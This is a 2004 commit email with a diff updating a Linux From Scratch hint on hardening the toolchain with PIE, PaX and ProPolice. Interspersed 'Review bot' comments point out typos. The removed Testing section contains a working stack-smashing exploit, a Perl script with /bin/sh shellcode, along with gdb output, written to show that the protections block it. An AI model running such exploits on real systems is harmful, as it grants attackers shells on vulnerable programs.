cvs commit: hints winter.txt

tushar at linuxfromscratch.org tushar at linuxfromscratch.org
Tue Feb 3 14:18:58 PST 2004


tushar      04/02/03 15:18:58

  Modified:    .        winter.txt
  Log:
  Updated: winter.txt
  
  Revision  Changes    Path
  1.4       +122 -537  hints/winter.txt
  
  Index: winter.txt
  ===================================================================
  RCS file: /home/cvsroot/hints/winter.txt,v
  retrieving revision 1.3
  retrieving revision 1.4
  diff -u -u -r1.3 -r1.4
  --- winter.txt	17 Jan 2004 03:27:09 -0000	1.3
  +++ winter.txt	3 Feb 2004 22:18:58 -0000	1.4
  @@ -1,23 +1,26 @@
   AUTHOR: Robert Connolly <cendres at videotron dot ca> (ashes)
   
  -DATE:   2003-12-25
  +DATE:   2004-02-02
   
   LICENSE:        Public Domain
   
  -SYNOPSIS:       ProPolice + Libsafe + Pax + PIE
  +SYNOPSIS:       Position independent executables + Pax
   
   PRIMARY URL:	ftp://twocents.mooo.com/pub/
   
   DESCRIPTION:
  -ProPolice is a C and C++ security extension for GCC.
  -Libsafe is a preloaded library that prevents dangerous functions from being
  -executed by applications.
  -Pax is a kernel patch which adds obscurity and lessens the vulnerability of
  -attacks.
  -PIE is a gcc-3.4 back port to enable Position Independent Executables, which
  -takes advantage of Pax.
  -The combination of these provide powerful security features in the tool chain.
  -All of the above can work independently of each other.
  +Experimental
  +Position independent executables (pie) is the superset of position independent
  +code (pic). Pie will be formally available with gcc-3.4, this hint uses the
  +original patch which made it in gcc-3.4. This provides extra security features
  +that can be used by Pax/Grsecurity, exec-shield, and others. It is also a good
  +idea to use ProPolice together with this even though there is overlapping
  +functionality.
  +
  +http://gcc.gnu.org/ml/gcc-patches/2003-06/msg00140.html
  +http://pax.grsecurity.net/
  +http://www.grsecurity.net/
  +http://people.redhat.com/mingo/exec-shield/
   
   PREREQUISITES: LFS-5.0
   
  @@ -28,10 +31,6 @@
   =======
   
   	Introduction
  -		ProPolice
  -		Libsafe
  -		Pax
  -		Pie
   	Downloads
   	Installation
   	Testing
  @@ -41,563 +40,153 @@
   ============
   Introduction
   ============
  -On my desktop, 800MHz Duron 512MB ram, I get one gcc error total from following
  -this hint.
  -The cvs LFS book is recommended at this time.
  -
  -----------------------------------
  -ProPolice Smashing Stack Protector
  -----------------------------------
  --The good news:
  -
  -Based on StackGaurd, ProPolice was developed by IBM for protecting applications
  -from stack smashing attacks. This is the single largest class of attacks and
  -many hope ProPolice will find its way into the mainstream GCC and become the
  -default smash guard. This protection uses the urandom device to determine the
  -guard value, and uses minimal time and space overhead. In practice users do not
  -complain about loss in system performance even when the entire system is build
  -with this guard.
  -
  -The patch will add -fstack-protector-all, -fstack-protector, and
  --fno-stack-protector to GCC extensions for C and C++; and
  -__guard_setup and __stack_smash_handler are defined in libgcc2.c. It is
  -recommended the entire system be built with -fstack-protector, with the
  -exception of Grub. Programs compiled with this which are run in chroot will
  -need access to /dev/urandom and for logging /dev/log. Syslog puts it in
  -/var/log/sys.log where intrusion detection can use it.
  -I have tested ProPolice on kernel 2.4 and 2.6, and libc linuxthreads and nptl.
  -It should work with any custom configuration you may have.
  -
  --The bad news:
  -
  -ProPolice assumes only character arrays are dangerous, and does not protect
  -arrays of length 7 or less. ProPolice does nothing to protect the heap.
  -Optimizing more then -O2 may optimize away things ProPolice needs.
  +Follow the cvs book with this hint. Unfortunately -fpie is slightly broken in
  +the glibc-2.3.3 that is in the LFS cvs book. I tested this against 
  +glibc-2.3-20040129. You also need a binutils that understands -pie, either HJL,
  +or FSF-cvs. If you use FSF-cvs binutils you will have to comment out the sanity
  +code in glibc/configure. grep -n -e "too old" configure, and comment out the
  +whole test. HJL should work without that hassle. I don't have a relro patch for
  +FSF binutils yet either, so HJL is reccommended.
   
  -You can expect one error from gcc3 test suite.
  -FAIL: gcc.dg/asm-names.c (test for excess errors)
  +=========
  +Downloads
  +=========
  +-----
  +Glibc
  +-----
  +Thanks to Teemu Tervo nptl hint. This shouldn't be nessesary soon.
  +
  +cvs -d :pserver:anoncvs at sources.redhat.com:/cvs/glibc -z3 co libc
  +mv libc glibc-2.3-`date +%Y%m%d`
  +tar cjf glibc-2.3-`date +%Y%m%d`.tar.bz2 glibc-2.3-`date +%Y%m%d`
  +rm -rf glibc-2.3-`date +%Y%m%d
  +
  +Glibc uses an executable stack in ld.so. To use Pax you will need this patch.
  +http://csociety-ftp.ecn.purdue.edu/pub/gentoo-portage/ \
  +	sys-libs/glibc/files/2.3.3/glibc-2.3.3-dl_execstack-PaX-support.patch
  +http://www.linuxfromscratch.org/patches/downloads/glibc/ \
  +	glibc-2.3.3-dl_execstack-PaX-support-1.patch
  +ftp://twocents.mooo.com/pub/hcc/pie/glibc-2.3.3-dl_execstack-PaX-support-1.patch
  +
  +This gives us Pax friendly behaviour from iconvconfig. I don't think its completely
  +nessesary. (works on gcc-2.3.3 too)
  +http://mirror.calvin.edu/gentoo/gentoo-portage/sys-libs/glibc/files/ \
  +	2.3.2/glibc-2.3.2-iconvconfig-name_insert.patch
  +ftp://twocents.mooo.com/pub/hcc/pie/glibc-2.3.2-iconvconfig-name_insert.patch
  +
  +This is pt_gnu support for Pax. Needed to use softmode, will become obligatory
  +eventualy.
  +http://mirror.calvin.edu/gentoo/gentoo-portage/sys-libs/glibc/files/ \
  +	2.3.3/glibc-2.3.3_pre20040117-pt_pax.diff
  +ftp://twocents.mooo.com/pub/hcc/pie/glibc-2.3.3_pre20040117-pt_pax.diff
   
   --------
  -Libsafe
  +Binutils
   --------
  --The good news:
  +HJL
  +ftp://ftp.kernel.org/pub/linux/devel/binutils/binutils-2.14.90.0.8.tar.bz2
   
  -Libsafe was developed by Avaya Labs to protect against format string
  -vulnerabilities. Though not widely used it has been widely tested. This
  -protection can be installed on an already running system, using ld.so.preload
  -to watch applications at runtime for functions which are known to be vulnerable.
  -This of course only protects dynamically linked applications. There should not
  -be a noticeable performance decrease, and it also logs to syslog.
  -
  --The bad news:
  -
  -We get some errors if we install Libsafe early in the build.
  -From gcc3
  -FAIL: g++.dg/expr/anew1.C execution test
  -FAIL: g++.dg/expr/anew2.C execution test
  -FAIL: g++.dg/expr/anew3.C execution test
  -FAIL: g++.dg/expr/anew4.C execution test
  -
  -From binutils
  -FAIL: S-records
  -FAIL: S-records with constructors
  -
  -To avoid these errors we install Libsafe after gcc in chapter 6.
  -Other bad news is unknown.
  -
  -----
  -Pax
  -----
  --The good news:
  -TODO
  --The bad news:
  -This hint does not use any enforcement.
  -Unknown
  +This patch combines 3 patches temporarily. When 2.14.90.0.9 is released we will only
  +need to patch the pt_pax portion. I think I forgot to mention this hint is bleeding
  +edge :)
  +ftp://twocents.mooo.com/pub/hcc/pie/ \
  +	binutils-2.14.90.0.8-pt_pax-eh_frame-relro-1.patch
   
   ----
   PIE
   ----
  --The good news:
  -TODO
  --The bad news:
  -This currently only works using a gcc-3.4 back port. It also needs Glibc-2.3.3
  -(cvs) to work.
  -This also requires a binutils which understands -pie.
  -X, kde, and others, do not like building with gcc -pie. They can still be
  -installed without -pie, for now.
  -
  -=========
  -Downloads
  -=========
  -----------
  -ProPolice
  -----------
  -ftp://twocents.mooo.com/pub/
  -
  -Patches are available for GCC 2.95.3, 3.3.1, and 3.3.2.
  -The protector_only patches will make GCC use -fstack-protector all the time.
  -http://www.linuxfromscratch.org/patches/downloads/gcc/ \
  -        gcc-{$ver}-protector-2.patch
  +Only need one on these.
  +http://cvs.mandrakesoft.com/cgi-bin/cvsweb.cgi/~checkout~/ \
  +        SPECS/gcc/gcc33-pie.patch
   http://www.linuxfromscratch.org/patches/downloads/gcc/ \
  -        gcc-{$ver}-protector_only-2.patch
  -
  -This patch enables the kernel to be built with -fstack-protector.
  -http://www.linuxfromscratch.org/patches/downloads/linux/ \
  -	linux-2.4.23-protector-1.patch
  -or
  -	linux-2.6.0-protector-1.patch
  -
  -Use this patch when building xfree86. It will use -fno-stack-protector when
  -building modules.
  -http://www.linuxfromscratch.org/patches/downloads/XFree86/ \
  -        XFree86-4.3.0-protector-1.patch
  -
  ---------
  -Libsafe
  ---------
  -Official site:
  -http://www.research.avayalabs.com/project/libsafe/src/libsafe-2.0-16.tgz
  -My mirror:
  -http://www.topside.org/~ashes/files/libsafe/libsafe-2.0-16.tgz
  +        gcc-3.3-pie-1.patch
  +ftp://twocents.mooo.com/pub/hcc/pie/gcc-3.3-pie-2.patch
   
   ----
   Pax
   ----
  -http://www.linuxfromscratch.org/patches/downloads/linux/ \
  -	linux-2.4.23-pax-1.patch
  -Official site:
  -http://pageexec.virtualave.net/ \
  -	pax-linux-2.4.23-200312021730.patch
  -http://cr0.org/aslr26/aslr26-linux-2.6.0-test9-200310272244.patch
  -My mirror:
  -http://www.topside.org/~ashes/files/pax/ \
  -	linux-2.4.23-pax-1.patch
  -http://www.topside.org/~ashes/files/pax/mirror/ \
  -	aslr26-linux-2.6.0-test9-200310272244.patch
  +Kernel 2.4
  +http://pax.grsecurity.net/pax-linux-2.4.23-200401091805.patch
   
  -This is an information leak patch. Its not available for 2.4.23 or 2.6.0 yet :(
  +Kernel 2.6
  +http://pax.grsecurity.net/pax-linux-2.6.1-200401091905.patch
  +
  +This is an information leak patch. Its not available for 2.6 yet :(
   http://cr0.org/pax-obscure/pax+obs-linux-2.4.22-200308302223.tar.gz
   
   ----
  -PIE
  +HGCC
   ----
  -http://www.linuxfromscratch.org/patches/downloads/gcc/ \
  -	gcc-3.3.2-pie-1.patch
  -For Gcc 3.3 and 3.3.1
  -	gcc-3.3-pie-1.patch
  -My mirror:
  -http://www.topside.org/~ashes/files/pax/gcc-3.3.2-pie-1.patch
  -http://www.topside.org/~ashes/files/pax/gcc-3.3-pie-1.patch
  -
  ---------------------
  -Full Bounds Checking
  ---------------------
  -This is an auditing tool to give verbose debugging. Applications built with this
  -will run like a pig. This is not intended for real world use, only for
  -debugging. -fbounds-checking is added to GCC extensions, and is not used by
  -default.
  -Official site:
  -http://web.inter.nl.net/hcc/Haj.Ten.Brugge/ \
  -	bounds-checking-gcc-3.3.2-1.00.patch.bz2
  -My mirror:
  -http://www.topside.org/~ashes/files/fbounds/gcc-3.3.2-bounds-checking-1.patch
  -or
  -http://www.topside.org/~ashes/files/fbounds/gcc-3.3.2-bounds-plus-pie-1.patch
  -
  ----------------------
  -Binutils-2.14.90.0.7
  ----------------------
  -You only need this for PIE.
  -ftp://ftp.kernel.org/pub/linux/devel/binutils/
  -
  -----------
  -Glibc-cvs
  -----------
  -# You only need this for PIE.
  -# Like the nptl hint shows. Get Glibc-cvs like this.
  -cvs -d :pserver:anoncvs at sources.redhat.com:/cvs/glibc -z3 co libc &&
  -mv libc glibc-2.3-`date +%Y%m%d` &&
  -tar cjf glibc-2.3-`date +%Y%m%d`.tar.bz2 glibc-2.3-`date +%Y%m%d` &&
  -rm -rf glibc-2.3-`date +%Y%m%d`
  +This is a specs file editor for changing the default behavior of gcc to use
  +-fpie and -ftack-protector-all. Check for newer versions. If anyone wants to
  +write this script better email me. hgcc3 has added ld -z relro and combreloc.
  +ftp://twocents.mooo.com/pub/hcc/hgcc3.sh
   
   =====================
   Installation
   =====================
  -ProPolice and Libsafe can be used effectively on LFS-5.0. If you want to use PIE
  -you need to get a copy of glibc-2.3.3-cvs, and binutils-2.14.90.0.7 or later.
  -
   ---------
   Chapter 5
   ---------
    - Binutils
  -Install binutils-2.14.90.0.7 just like the book says.
  -Bison, m4, and flex need to be installed in chapter 5 to satisfy this version of
  -Binutils.
  -
  - - GCC pass 1
  -If this is your second round with ProPolice, and the host system is running
  -protector_only, you can use the protector_only patch in GCC pass 1. If it's your
  -second round with PIE, you can use the PIE patch in gcc pass 1 also.
  -The old version of this hint used a move to glibc patch which I have removed. I
  -don't think its necessary. In order to escape it do not patch at this stage,
  -prepend CFLAGS="-fno-stack-protector -O2" to configure, and append it to make.
  -This will work out after glibc is installed.
  +Use this everytime you build binutils.
  +patch -Np1 -i ../binutils-2.14.90.0.8-pt_pax-eh_frame-relro-1.patch
  +
  +Before make check do hgcc -r. After make check do hgcc -pa-fpie
  +Repeat this for any binutils make check. No other packages are known to have
  +issues like this.
   
    - Glibc-cvs
  -No need for the scanf patch with glibc-cvs. Add --enable-add-ons=linuxthreads to
  -configure. This also works with nptl. Make check should pass with no errors. If
  -you have Libsafe on the host system you might want to remove "/lib/libsafe.so.2"
  -from /etc/ld.so.preload just for glibc, and add it back after glibc is
  -installed. This is not because of a Libsafe violation, but Libsafe will cause
  -the glibc build to fail.
  -Bug: Glibc doesn't like the Pax randomization durring make or make check. I
  -think I've read about a Pax/Glibc bug on google. For now use a vanilla kernel on
  -the host.
  +If you plan to use the programs in /tools after you reboot, then use the patches
  +from chap6 glibc below.
   
    - GCC pass 2
  -Auditors might want to install gcc-3.3.2-bounds-plus-pie-1.patch, or
  -gcc-3.3.2-bounds-checking-1.patch. The the patch contains instructions about its
  -use. Use the gcc-3.3.2.tar.bz2 tar ball to keep the patch from complaining.
  -The Bounds Checking patch and PIE are merged, if applied separately they
  -conflict on one file. If you're using PIE you should see "checking linker
  -position independent executable support... yes" during configure.
  -
  -patch -Np1 -i ../gcc-3.3.2-protector_only-2.patch
  -patch -Np1 -i ../gcc-3.3.2-pie-1.patch
  -
  - - Binutils pass 2
  -env CFLAGS="-pie -O2" ../binutils-2.14.90.0.7/configure \
  -	 --prefix=/tools --enable-shared --with-lib-path=/tools/lib &&
  -env CFLAGS="-pie -O2" make
  -# There is a ProPolice, and PIE bug in the test suite. Do this to pass the tests.
  -make CFLAGS="-fno-stack-protector -O2" check
  -
  -# And now we have "shared object" because of -pie.
  -$ file /tools/bin/ld
  -/tools/bin/ld: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), not 
  -stripped
  -
  -The easiest thing do to now is this. Or pass env like we did above.
  -This assumes you installed the propolice_only patch.
  -export CFLAGS="-pie -O2"
  -export CXXFLAGS="-pie -O2"
  -
  - - Bzip2
  -cp Makefile Makefile.backup &&
  -sed -e 's%$(BIGFILES)%$(BIGFILES) $(OPT)%' Makefile.backup > Makefile &&
  -make OPT="$CFLAGS" PREFIX=/tools install
  -
  - - Perl
  -env LDFLAGS="-pie" ./configure.gnu --prefix=/tools -Dstatic_ext='IO Fcntl'
  -make perl utilities  OPTIMIZE="-pie -O2" LDFLAGS="-pie"
  +patch -Np1 -i ../gcc-3.3-pie-2.patch
   
  -Install the rest of chapter 5, and don't forget to install m4, bison, and flex
  -in /tools.
  + - HGCC
  +cp hgcc3.sh /tools/bin/hgcc
  +chmod +x /tools/bin/hgcc
  +hgcc -pa-fpie
   
   ---------
   Chapter 6
   ---------
    - Glibc
  -With this all your libraries will be shared objects.
  -export CFLAGS="-pie -O2"
  -export CXXFLAGS="-pie -O2"
  +patch -Np1 -i ../glibc-2.3.3-dl_execstack-PaX-support-1.patch
  +patch -Np1 -i ../glibc-2.3.2-iconvconfig-name_insert.patch
  +patch -Np1 -i ../glibc-2.3.3_pre20040117-pt_pax.diff
   
  - - Binutils
  -make CFLAGS="-fno-stack-protector -O2" check
  +Checking for fpie and relro should answer "yes" durring configure.
   
    - GCC
  -patch -Np1 -i ../gcc-3.3.2-protector_only-2.patch
  -patch -Np1 -i ../gcc-3.3.2-pie-1.patch
  -
  - - Libsafe
  -There are tests in the Libsafe source you should look at.
  -make &&
  -make install
  -
  -- Lfs-utils
  -For some reason mktemp wont build as a shared object.
  -
  - - Vim
  -env LDFLAGS="-pie" ./configure...
  -
  - - Less
  -env LDFLAGS="-pie" ./configure...
  -
  - - Net-tools
  -make COPTS="-D_GNU_SOURCE -Wall $CFLAGS" LOPTS="-pie"
  -
  - - Perl
  -env LDFLAGS="-pie" ./configure.gnu --prefix=/usr -Dpager="/bin/less -isR"
  -make OPTIMIZE="-pie -O2" LDFLAGS="-pie"
  -
  - - Bzip2
  -cp Makefile Makefile.backup
  -sed -e 's%$(BIGFILES)%$(BIGFILES) $(OPT)%' \
  -Makefile.backup > Makefile
  -cp Makefile-libbz2_so Makefile-libbz2_so.backup
  -sed -e 's%$(BIGFILES)%$(BIGFILES) $(OPT)%' \
  -Makefile-libbz2_so.backup > Makefile-libbz2_so
  -
  -make -f Makefile-libbz2_so OPT="$CFLAGS"
  -make clean
  -make OPT="$CFLAGS"
  -
  - - Ed
  -env LDFLAGS="-pie" ./configure...
  -
  - - Kbd
  -make CFLAGS="$CFLAGS" LDFLAGS="-pie"
  +patch -Np1 -i ../gcc-3.3-pie-2.patch
   
  - - E2fsprogs
  -make LDFLAGS="-pie"
  + - HGCC
  +cp hgcc3.sh /usr/bin/hgcc
  +chmod +x /usr/bin/hgcc
  +hgcc -pa-fpie
   
    - Grub
  -env CFLAGS="" ./configure --prefix=/usr
  -make CFLAGS=-fno-stack-protector
  +hgcc -r before configure, hgcc -pa-fpie after make install.
   
  - - Man
  -cp man2html/Makefile.in man2html/Makefile.in.backup
  -sed -e "s/CFLAGS = /CFLAGS = -O -pie /" \
  -man2html/Makefile.in.backup > man2html/Makefile.in
  -./configure -default -confdir=/etc
  -make CFLAGS="-O -pie" LDFLAGS="-pie"
  -
  - - Procinfo
  -make LDLIBS=-lncurses CFLAGS="$CFLAGS" LDFLAGS="-pie"
  -
  - - Procps
  -make CC="gcc -fpie"
  -
  - - Sysklogd
  -make RPM_OPT_FLAGS="$CFLAGS" LDFLAGS="-pie"
  -
  - - Sysvinit
  -make -C src CFLAGS="-Wall -D_GNU_SOURCE $CFLAGS" LDFLAGS="-pie"
  -
  - - Util-linux
  -make HAVE_KILL=yes HAVE_SLN=yes LDFLAGS="-pie"
  -
  - - GCC 2.95.3
  -unset CFLAGS CXXFLAGS
  -patch -Np1 -i ../gcc-2.95.3-protector.patch
  + - Util Linux
  +For now pivot_root doesn't build with fpie. Needs investigation, maybe patch.
  +hgcc -r before configure, hgcc -pa-fpie after make install.
   
   ---------
   Chapter 8
   ---------
  -Linux kernel
  + - Linux Kernel
  +patch -Np1 -i ../pax-linux-2.4.23-200401091805.patch
   
  -make mrproper &&
  -patch -Np1 -i ../linux-2.4.23-propolice-1.patch &&
  -patch -Np1 -i ../linux-2.4.23-pax-1.patch
  -
  -make menuconfig
  -
  -Don't use "Enforce non-executable pages" or you wont be able to login after.
  -
  -make CC="/opt/gcc-2.95.3/bin/gcc -fstack-protector" dep
  -make CC="/opt/gcc-2.95.3/bin/gcc -fstack-protector" bzImage
  -make CC="/opt/gcc-2.95.3/bin/gcc -fstack-protector" modules
  -make CC="/opt/gcc-2.95.3/bin/gcc -fstack-protector" modules_install
  -
  -Try to remember to add -pie to CFLAGS/CXXFLAGS when to install other packages.
  -LDFLAGS too sometimes if needed.
  +I can boot using all the options except:
  +CONFIG_PAX_EMUSIGRT and CONFIG_PAX_NOELFRELOCS
   
   ========
   Testing
   ========
  -
  -## This program overflows the stack.
  -
  -cat > test-propolice.c << "EOF"
  -/* test-propolice.c */
  -
  -#define OVERFLOW "This is longer than 10 bytes"
  -
  -int main (int argc, char *argv[]) {
  -    char buffer[10];
  -    strcpy(buffer, OVERFLOW);
  -    return 0;
  -}
  -EOF
  -
  -# Then compile and run as follows
  -
  -gcc -fstack-protector -o test-propolice test-propolice.c &&
  -./test-propolice
  -
  -# That should return this to show the guard is working.
  -# "stack smashing attack in function main"
  -
  -# You should also see a syslog message similar to this:
  -
  -# test-propolice[19961]: [ID 702911 auth.crit] stack smashing attack in function
  -# main
  -
  -# This program segfaults and the guard ignores it.
  -
  -cat > fail.c << "EOF"
  -#include <stdio.h>
  -#include <unistd.h>
  -
  -int foo(char *blah) {
  -  char buffer[7];
  -  sprintf(buffer, "12345678901234567890123456789012345678901234567890");
  -  return(1234);
  -}
  -
  -int main(int argc, char **argv) {
  -  printf("before foo()\n");
  -  foo("blah");
  -  printf("after foo()\n");
  -}
  -EOF
  -
  -gcc -fstack-protector -o fail fail.c &&
  -./fail
  -
  -# Which should return this.
  -# before foo()
  -# Segmentation fault
  -
  -First we run thise code with no protection.
  -We are using -static so libsafe isn't used.
  -
  -cat > foo.c << "EOF"
  -/* foo.c */
  -
  - #include <stdio.h>
  - int main(int argc, char **argv)
  - {
  - char buffer[180];
  - if(argc>1)
  - strcpy(buffer,argv[1]);
  - printf("Miam...\n");
  - }
  -EOF
  -
  -gcc -fno-stack-protector -static -o foo foo.c
  -
  -cat > x.pl << "EOF"
  -#!/usr/bin/perl
  -
  - ### le shellcode qui execute /bin/sh
  - $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .
  - "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
  - "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
  - "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  -
  - ### Return Address / ESP
  - $ret = 0xbffff8a0;
  -
  - ### la taille du buffer
  - $buf = 208;
  -
  - $egg = 2000;
  -
  - $nop = "\x90";
  -
  - $offset = 0;
  -
  - if (@ARGV == 1) { $offset = $ARGV[0]; }
  - $addr = pack('l', ($ret + $offset));
  -
  - for ($i = 0; $i < $buf; $i += 4) {
  - $buffer .= $addr;
  - }
  -
  - for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++){
  - $buffer .= $nop;
  - }
  -
  - $buffer .= $shellcode;
  - exec("./foo", $buffer,0);
  -EOF
  -
  -Install gdb from http://ftp.gnu.org/gnu/gdb/gdb-6.0.tar.gz
  -Run this, add run `perl -e 'print "A"x208'`
  -Look for "esp 0xbffff8a0", you might have to edit x.pl for you.
  -
  -$ gdb foo
  -GNU gdb 6.0
  -Copyright 2003 Free Software Foundation, Inc.
  -GDB is free software, covered by the GNU General Public License, and you are
  -welcome to change it and/or distribute copies of it under certain conditions.
  -Type "show copying" to see the conditions.
  -There is absolutely no warranty for GDB.  Type "show warranty" for details.
  -This GDB was configured as "i686-pc-linux-gnu"...(no debugging symbols found)...
  -(gdb) run `perl -e 'print "A"x208'`
  -Starting program: /home/ashes/LFS/export/testing/foo `perl -e
  -'print "A"x208'`
  -(no debugging symbols found)...(no debugging symbols found)...Miam...
  -
  -Program received signal SIGSEGV, Segmentation fault.
  -0x41414141 in ?? ()
  -(gdb) info reg
  -eax            0x8      8
  -ecx            0x1fc018d2       532682962
  -edx            0x4014fe00       1075117568
  -ebx            0x4014f9e8       1075116520
  -esp            0xbffff8a0       0xbffff8a0
  -ebp            0x41414141       0x41414141
  -esi            0x40015020       1073827872
  -edi            0xbffff8e4       -1073743644
  -eip            0x41414141       0x41414141
  -eflags         0x10246  66118
  -cs             0x23     35
  -ss             0x2b     43
  -ds             0x2b     43
  -es             0x2b     43
  -fs             0x0      0
  -gs             0x0      0
  -(gdb) kill
  -Kill the program being debugged? (y or n) y
  -(gdb) quit
  -
  -$ ./x.pl
  -Miam...
  -sh-2.05b$
  -
  -This only demonstrates that bad code can freak out and exit to a shell.
  -If this code were part of a daemon running as root, or suid, it would give
  -root shell. The exploits in the libsafe source, and paxtest is basicly the
  -same as this. The paxtest ones are the most modern.
  -
  -Now lets try this code with propolice.
  -
  -rm foo && gcc -fstack-protector -static -o foo foo.c
  -gdb foo
  -...
  -run `perl -e 'print "A"x208'`
  -..
  -Starting program: /home/ashes/LFS/export/testing/foo `perl -e
  -'print "A"x208'`
  -(no debugging symbols found)...(no debugging symbols found)...Miam...
  -foo: stack smashing attack in function main
  -Program received signal SIGABRT, Aborted.
  -0x40047b81 in kill () from /lib/libc.so.6
  -(gdb)
  -
  -Here we can see propolice aborted the program, and now ./x.pl also aborts.
  -Next we test libsafe.
  -
  -rm foo && gcc -fno-stack-protector -o foo foo.c
  -
  -$ ./x.pl
  -Libsafe version 2.0.16
  -Detected an attempt to write across stack boundary.
  -Terminating /home/ashes/LFS/propolice/export/20031223/testing/foo.
  -    uid=1001  euid=1001  pid=742
  -Call stack:
  -    0x40018cbc  /lib/libsafe.so.2.0.16
  -    0x40018deb  /lib/libsafe.so.2.0.16
  -    0x80483a2   /home/ashes/LFS/propolice/export/20031223/testing/foo
  -    0x40039a96  /lib/libc-2.3.2.so
  -Overflow caused by strcpy()
  -Killed
  -
  -And now if you want to build the Pax patch into your kernel, reboot,
  -and start again you will notice the first test doesn't work because
  -the return address keeps changing.
  +Download:
  +http://pax.grsecurity.net/paxtest-0.9.5.tar.gz
   
   ========
   Feedback
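Review bot: the glibc-cvs download sequence has lost the closing backtick on its last line, `rm -rf glibc-2.3-\`date +%Y%m%d` (the removed version of the same block further down had it), so a shell will either wait for more input or fail with a syntax error; restore the trailing backtick, and consider keeping the `&&` chaining the old block used so a failed checkout does not fall through to the rm -rf. In the HGCC description, `-ftack-protector-all` should read `-fstack-protector-all`. The iconvconfig note "(works on gcc-2.3.3 too)" presumably means glibc-2.3.3. The Testing section now holds only a paxtest download URL; a one-line pointer to how it is run, or to where the removed tests now live, would help a reader who follows the TOC there. Spelling: reccommended, nessesary (twice), eventualy, everytime, durring, and "Its not available" should be "It's not available".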
  @@ -607,24 +196,12 @@
   
   ACKNOWLEDGMENTS:
   
  -* Thanks to Hiroaki Etoh for providing the protector patch to IBM
  -* Thanks to IBM for providing the protector patch at
  -	http://www.research.ibm.com/trl/projects/security/ssp/
  -* Thanks to OpenBSD for their XFree86 code. http://www.openbsd.org/
  -* Thanks to netsys.com for this
  -	http://www.netsys.com/cgi-bin/display_article.cgi?1266
  -* Thanks to securityfocus.com and immunix.com for this
  -	http://www.securityfocus.com/archive/1/333986/2003-08-17/2003-08-23/2
  -* Thanks to adamantix.org for kernel patches. http://www.adamantix.org/
  -* Thanks to Avaya Labs for Libsafe
  -	http://www.research.avayalabs.com/project/libsafe/
  -* Thanks to the Pax Team at http://pageexec.virtualave.net/
  -* Thanks to Teemu Tervo for nptl hint
  -	http://www.linuxfromscratch.org/hints/downloads/files/nptl.txt
  -* Thanks to cross compiling hint
  -	http://www.linuxfromscratch.org/hints/downloads/files/ \
  -		crosscompiling-x86.txt
  -
  +* Thanks to Gnu for the GNU toolchain. http://www.gnu.org/
  +* Thanks to Redhat for contributions to the GNU toolchain.
  +	http://www.redhat.com/
  +* Thanks to the Pax team. http://pax.grsecurity.net/
  +* Thanks to Gentoo and the Hardended Gentoo team for development,
  +  testing, and patches. http://www.gentoo.org/proj/en/hardened/
   
   CHANGELOG:
   [2003-10-18]
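Review bot: "Hardended Gentoo" should be "Hardened Gentoo" in the Gentoo acknowledgment line.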
  @@ -676,3 +253,11 @@
   [2003-12-25]
   * More cflags.
   * New tests.
  +[2004-02-02]
  +* Update gcc pie patch.
  +* Moved Libsafe and ProPolice to prolice.txt
  +* Added fpie to hgcc2.sh
  +[2004-02-03]
  +* Add gnu_pt patches.
  +* Add ld -z relro support.
  +* Added relro and combreloc to hgcc3.sh
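Review bot: the [2004-02-02] entry "Moved Libsafe and ProPolice to prolice.txt" looks like a typo for propolice.txt, and "Added fpie to hgcc2.sh" names a script version that nothing else in this revision mentions (Downloads and Installation refer to hgcc3.sh only); either name the current script or note the rename. The [2004-02-03] entry says "gnu_pt patches" while the Downloads section calls the same material "pt_gnu support" and the patch files are named pt_pax; use one name consistently.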
  
  
  


